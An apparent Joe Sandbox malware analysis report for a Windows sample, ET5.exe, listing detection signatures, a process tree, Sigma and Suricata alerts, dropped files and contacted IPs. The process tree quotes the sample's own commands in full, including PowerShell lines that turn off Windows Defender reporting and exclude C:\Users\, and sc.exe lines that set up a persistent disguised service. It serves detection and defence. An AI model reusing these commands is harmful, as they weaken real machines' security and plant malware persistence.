Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ET5.exe

Overview

General Information

Sample name:ET5.exe
Analysis ID:1570047
MD5:98c7ec9eb9c760e176a78a01bcb9f91c
SHA1:f88a8f1c1be4d07dafb27c65d36217eea4125020
SHA256:e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
Tags:exeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • ET5.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\ET5.exe" MD5: 98C7EC9EB9C760E176A78A01BCB9F91C)
  • ET5.exe (PID: 6300 cmdline: C:\Users\user\Desktop\ET5.exe MD5: 98C7EC9EB9C760E176A78A01BCB9F91C)
    • cmd.exe (PID: 4980 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6544 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7060 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4676 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)
      • taskkill.exe (PID: 5972 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3780 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6020 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5880 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5136 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 4816 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 7164 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hstmhco83f64lehv4q0wbzqj3o.exe (PID: 5760 cmdline: "C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
  • main.exe (PID: 1524 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 1524, ProcessName: main.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4980, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 6544, ProcessName: powershell.exe
Sigma detected: Suspicious New Service Creation
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ParentProcessId: 6128, ParentProcessName: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6020, ProcessName: sc.exe
Sigma detected: Suspicious Program Location with Network Connections
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 23.137.250.43, DestinationIsIpv6: false, DestinationPort: 24642, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 1524, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49868
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4980, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 4676, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ParentProcessId: 6128, ParentProcessName: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6020, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4980, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 6544, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-06T14:21:23.373965+010020092081A Network Trojan was detected192.168.2.52708065.191.158.522146UDP
2024-12-06T14:21:56.324082+010020092081A Network Trojan was detected192.168.2.527080135.181.195.24030302UDP
2024-12-06T14:22:36.588670+010020092081A Network Trojan was detected192.168.2.5270802.178.163.16730497UDP
2024-12-06T14:23:25.963992+010020092081A Network Trojan was detected192.168.2.527080120.155.52.25316538UDP
2024-12-06T14:23:37.027464+010020092081A Network Trojan was detected192.168.2.52708045.61.165.22415027UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-06T14:21:23.373929+010020092051A Network Trojan was detected192.168.2.52708072.221.27.4619892UDP
2024-12-06T14:22:09.417128+010020092051A Network Trojan was detected192.168.2.52708073.195.118.7623154UDP
2024-12-06T14:23:02.682528+010020092051A Network Trojan was detected192.168.2.52708045.8.159.10617893UDP
2024-12-06T14:23:09.715340+010020092051A Network Trojan was detected192.168.2.5270805.187.75.15965351UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-06T14:21:20.215395+010020092061A Network Trojan was detected192.168.2.52708062.113.245.7618771UDP
2024-12-06T14:21:57.323517+010020092061A Network Trojan was detected192.168.2.527080118.178.193.22011030UDP
2024-12-06T14:22:35.589495+010020092061A Network Trojan was detected192.168.2.527080174.2.11.19117369UDP
2024-12-06T14:23:21.838808+010020092061A Network Trojan was detected192.168.2.527080101.184.38.18014558UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-06T14:21:15.965055+010020092071A Network Trojan was detected192.168.2.527080122.18.238.13411749UDP
2024-12-06T14:21:49.325449+010020092071A Network Trojan was detected192.168.2.52708089.117.55.22816717UDP
2024-12-06T14:22:27.577527+010020092071A Network Trojan was detected192.168.2.52708023.137.250.4324642UDP
2024-12-06T14:23:04.733458+010020092071A Network Trojan was detected192.168.2.527080101.184.38.18014558UDP
2024-12-06T14:23:19.840083+010020092071A Network Trojan was detected192.168.2.527080102.130.123.1623055UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://netdb.i2p2.no/Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeAvira: detection malicious, Label: TR/AVI.Agent.jibab
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeReversingLabs: Detection: 66%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: Binary string: RfxVmt.pdbGCTL source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF704893DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,11_2_00007FF704893DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708871CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF708871CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFAB31F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFAB31F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF70887737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BA50967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFAB9BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB8293B

Networking

barindex
Found Tor onion address
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: update.pkg.10.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: gBXHuZY0.22.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Source: hstmhco83f64lehv4q0wbzqj3o.exe.2.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknownNetwork traffic detected: IP country count 18
Source: global trafficTCP traffic: 192.168.2.5:49704 -> 45.202.33.26:1128
Source: global trafficTCP traffic: 192.168.2.5:49868 -> 23.137.250.43:24642
Source: global trafficTCP traffic: 192.168.2.5:49869 -> 101.184.38.180:14558
Source: global trafficTCP traffic: 192.168.2.5:49870 -> 66.130.28.102:9823
Source: global trafficTCP traffic: 192.168.2.5:49871 -> 65.191.158.5:22146
Source: global trafficTCP traffic: 192.168.2.5:49940 -> 154.216.20.137:41674
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 2.178.163.167:30497
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 178.208.86.162:17106
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 95.84.200.6:23537
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 62.113.245.76:18771
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 89.117.55.228:16717
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 5.187.75.159:65351
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 94.63.209.161:22635
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 195.252.220.165:49186
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 73.195.118.76:23154
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 45.8.159.106:17893
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 103.39.221.193:11262
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 122.18.238.134:11749
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 135.181.195.240:30302
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 118.178.193.220:11030
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 62.163.0.34:22955
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 209.126.85.115:14567
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 45.144.234.105:4567
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 45.61.165.224:15027
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 72.221.27.46:19892
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 146.70.87.105:25992
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 95.216.185.165:24092
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 102.130.123.16:23055
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 79.246.173.34:30090
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 45.141.101.45:3456
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 121.98.12.248:38371
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 174.2.11.191:17369
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 120.155.52.253:16538
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 139.129.17.126:9587
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 2.24.224.185:21701
Source: global trafficUDP traffic: 192.168.2.5:27080 -> 130.185.251.21:18735
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 122.18.238.134:11749
Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 62.113.245.76:18771
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 72.221.27.46:19892
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 65.191.158.5:22146
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 89.117.55.228:16717
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 135.181.195.240:30302
Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 118.178.193.220:11030
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 73.195.118.76:23154
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 23.137.250.43:24642
